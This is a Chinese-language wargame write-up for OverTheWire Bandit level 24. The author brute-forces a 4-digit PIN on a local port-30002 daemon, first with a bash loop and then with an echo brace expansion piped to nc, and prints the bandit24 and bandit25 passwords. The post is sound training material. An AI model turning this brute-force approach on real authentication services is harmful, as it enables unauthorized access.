当前位置：首页 > news >正文

Wargames与bash知识16

news 2025/11/5 19:18:09

Wargames与bash知识16

Bandit24

关卡提示：

  一个守护进程正在端口30002上侦听，如果给定bandit24的密码和一个4位数的密码，它将为您提供bandit25的密码。没有办法检索pincode，除非遍历所有10000个组合，称为暴力强制。

您不需要每次都创建新的连接

这一关用了很长的时间才获得的密码
从关卡提示来看，我第一想到的循环，其次是构建四位数0001—9999。构建数字列表我先想到的是seq命令和花括号扩展。
先在终端命令行看看效果：

bandit24@bandit:~$ seq -w 0001 0009
0001
0002
0003
0004
0005
0006
0007
0008
0009
bandit24@bandit:~$ echo {0001..0009}
0001 0002 0003 0004 0005 0006 0007 0008 0009

先用用户bandit24登录，给30002发一个字符串看看

bandit24@bandit:~$ echo "fdsafsadsf" |nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Fail! You did not supply enough data. Try again.
gfffffffffffff 33
Timeout. Exiting.
bandit24@bandit:~$ gfffffffffffff 33
gfffffffffffff: command not found

获得提示：
1、我是用户bandit25的密码检查器。请在一行中输入用户bandit24的密码和密码，并用空格分隔。
2、连接到出现超时中间有时间间隔
3、输入字符gfffffffffffff 33，用户输入被阻隔直到提示符出现。

我最后选择使用了花括号扩展写了一个脚本，下面是脚本内容。设置9个数字用于检测效果

bandit24@bandit:/tmp/bdit25$ cat it25
#!/bin/bashfor i in {0001..0009};doecho VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar\ $i |nc localhost 30002donebandit24@bandit:/tmp/bdit25$ ./it25
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Wrong! Please enter the correct pincode. Try again.
Timeout. Exiting.
………省略
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Wrong! Please enter the correct pincode. Try again.
Timeout. Exiting.

使用脚本发现效率奇低，每次循环发送一次字符，然后需等待阻塞结束才会执行下一次循环。回头看提示：有“您不需要每次都创建新的连接“提示，说明使用循环的方法不是最佳的选择。直接用echo给30002端口发送字符串会怎么样呢？

bandit24@bandit:~$ echo VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar\ {0001..0009} |nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Wrong! Please enter the correct pincode. Try again.
Timeout. Exiting.

执行命令echo VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar\ {0001…0009} |nc localhost 30002后发现，给端口30002发送字符串只执行了一次。将echo VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar\ {0001…0009}输出重定向到log文件，查看log发现花括号扩展的结果是一行。

bandit24@bandit:/tmp/bdit25$ echo VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar\ {0001..0009} >>log
bandit24@bandit:/tmp/bdit25$ cat -n log1  VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0001 VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0002 VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0003 VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0004 VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0005 VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0006 VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0007 VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0008 VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0009
bandit24@bandit:/tmp/bdit25$
bandit24@bandit:/tmp/bdit25$ ls
it25  log
bandit24@bandit:/tmp/bdit25$ rm log
bandit24@bandit:/tmp/bdit25$ echo VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar\ {0001..0009}\n >>log
bandit24@bandit:/tmp/bdit25$ cat -n log1  VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0001n VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0002n VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0003n VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0004n VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0005n VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0006n VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0007n VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0008n VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0009n
bandit24@bandit:/tmp/bdit25$ rm log
bandit24@bandit:/tmp/bdit25$ echo -e VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar\ {0001..0009}\n >>log
bandit24@bandit:/tmp/bdit25$ cat -n log1  VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0001n VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0002n VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0003n VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0004n VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0005n VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0006n VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0007n VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0008n VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0009n
bandit24@bandit:/tmp/bdit25$ rm log
bandit24@bandit:/tmp/bdit25$ echo -e VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar\ {0001..0009}\\n >>log
bandit24@bandit:/tmp/bdit25$ cat -n log1  VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 00012   VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 00023   VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 00034   VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 00045   VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 00056   VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 00067   VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 00078   VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 00089   VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 000910

经过测试发现：echo -e VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar\ {0001…9999}\n符合要求，现在尝试发送到30002端口，这次很快就获得了密码。

bandit24@bandit:/tmp/bdit25$ echo -e VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar\ {0001..9999}\\n |nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Wrong! Please enter the correct pincode. Try again.
……
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Correct!
The password of user bandit25 is p7TaowMYrmu23Ol8hiZh9UvD0O9hpx8dExiting.
bandit24@bandit:/tmp/bdit25$

其他尝试，使用echo -e VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar\ {0001…9999}\n重定向一个文件，然后将文件内容发送至30002。虽然理论可行，但我在服务器没有实现，提示Wrong的错误到一定行数就像停止了一样。

bandit24@bandit:~$ cd /tmp/bdit25
bandit24@bandit:/tmp/bdit25$ echo -e VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar\ {0001..9999}\\n >>zidian
bandit24@bandit:/tmp/bdit25$ head zidian
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0001VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0002VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0003VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0004VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0005VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0006VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0007VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0008VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0009VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0010

Wargames与bash知识16